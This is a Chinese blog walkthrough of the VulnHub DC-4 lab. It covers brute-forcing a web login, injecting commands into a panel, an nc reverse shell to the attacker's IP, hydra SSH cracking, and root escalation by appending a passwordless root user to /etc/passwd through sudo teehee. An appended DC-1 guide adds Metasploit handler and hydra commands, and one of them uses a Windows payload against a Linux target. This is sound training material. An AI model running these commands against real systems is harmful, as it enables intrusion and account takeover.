Vulnhub靶机——DC-4

目录

一、实验环境

1.1 攻击机Kali

1.2 靶机下载

1.3 工具准备

二、站点信息收集

2.1 IP扫描

2.2 端口扫描

2.3 目录扫描

三、漏洞利用

3.1 暴力破解

3.2 命令执行

四、权限提升

4.1 nc反弹shell

4.2 收集信息

4.3 teehee提权


一、实验环境

1.1 攻击机Kali

(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式

(2)Kali的IP地址为192.168.101.130

1.2 靶机下载

(1)下载地址: DC: 4 ~ VulnHub

(2)通过上述简介可以知道,此靶机只有一面旗帜,但有多个入口点。

(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式

(4)开启靶机

1.3 工具准备
  • BurpSuite
  • 用户名和密码的渗透字典
  • hydra

二、站点信息收集

2.1 IP扫描

使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.150

2.2 端口扫描

(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口

(2)访问80端口,是一个登录界面

2.3 目录扫描

使用dirsearch工具对网站目录进行扫描,没有什么其他的发现,都需要先进行登录

三、漏洞利用

3.1 暴力破解

(1)在登录页面输入随机的用户名和密码,打开burpsuite进行抓包

(2)将抓到的数据包发送到Intruder

(3)设置爆破类型为Cluster bomb,添加爆破点username和password

(4)为用户名和密码上传常见的字典并开始爆破

(5)成功得到用户名和密码admin|happy

3.2 命令执行

(1)使用爆破出来的数据进行登录,登录页面如下,点击Command

(2)选择List Files,点击run,回显命令ls -l和命令执行的结果

(3)使用burpsuite进行抓包,在ls+-l处尝试命令注入

(4)将数据包发送到Repeater

(5)在数据包的ls -l处写入命令whoami,点击send,发现网页执行了该命令,存在命令执行漏洞

四、权限提升

4.1 nc反弹shell

(1)在kali中开启监听

(2)在数据包中写入nc反弹shell命令,点击send,命令执行成功

nc -e /bin/bash 192.168.101.130 5555 //空格用+替换

(3)kali监听成功

4.2 收集信息

(1)使用脚本获得一个交互式的webshell

python -c 'import pty;pty.spawn("/bin/bash")'

(2)在/home/jim目录下发现一个old-passwords.bak文件,可能是jim用户之前使用过的旧密码,查看该文件

(3)另外两个用户charles和sam目录下没有什么东西

(4)将刚刚old-passwords.bak文件中的密码保存到一个passwd.txt文件中

(5)使用hydra工具进行爆破,爆破成功

hydra -l jim -P /home/kali/Desktop/渗透字典/passwd.txt -t 10 ssh://192.168.101.150

(6)使用爆破出来的密码进行登录,这里提示我们有一封邮件

(7)去邮件目录下查看内容,发现charles用户的密码^xHhA&hvim0y

(8)切换到charles用户,登录成功

4.3 teehee提权

(1)由于charles目录下没有什么有用的东西,查看可以执行的root权限的命令

teehee 是一个非常小型的文本编辑器,通常用于 Linux 系统中的命令行环境。它的功能和操作方式类似于其他命令行文本编辑器,不具备像 vim 或 nano 那样丰富的功能和扩展性。它的目的是为用户提供一个快速、直观的编辑工具,适合需要快速修改文本文件的场景。

(2)利用管道符配合teehee命令,在passwd文件里写入一个不用密码的root权限的用户awuawu,并切换用户

echo 'awuawu::0:0:::/bin/bash' | sudo teehee -a /etc/passwd //-a表示将内容追加到文件末尾

(3)提权成功,查看flag

声明

1.本博客文章均为博主日常学习原创内容,转载请注明出处。

2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。

3.希望以上的学习经验分享能对您有所帮助。

4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。

### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值